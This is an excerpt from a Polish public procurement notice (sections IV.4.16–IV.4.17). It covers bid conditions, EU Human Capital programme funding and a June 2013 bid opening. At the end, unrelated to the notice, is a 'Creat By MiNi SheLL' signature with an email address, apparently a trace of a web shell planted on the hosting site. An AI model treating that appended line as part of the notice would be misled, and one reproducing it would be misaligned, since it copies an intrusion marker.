<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> -  Zamawiający nie dopuszcza składania ofert częściowych.
-  Zamawiający nie dopuszcza składania ofert wariantowych.
-  Zamawiający nie przewiduje zamówień uzupełniających.
-  Zamawiający nie przewiduje zawarcia umowy ramowej.
-  Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
-  Zamawiający nie przewiduje zastosowania aukcji elektronicznej.
- Zamówienie jest finansowane ze środków Unii Europejskiej w ramach projektu: Profesjonalizm 
   naszą dewizą - uśmiech naszą wizytówką współfinansowanego ze środków Europejskiego Funduszu 
   Społecznego, realizowanego z Programu Operacyjnego Kapitał Ludzki - Priorytet VI Rynek pracy 
   otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności 
   zawodowej w regionie, Poddziałanie 6.1.2 Wsparcie powiatowych i wojewódzkich urzędów pracy 
   w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie
-  Otwarcie ofert nastąpi w dniu 14.06.2013 r. o godz. 12:10 w siedzibie Zamawiającego 
w pokoju  nr 208. Otwarcie ofert jest jawne.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com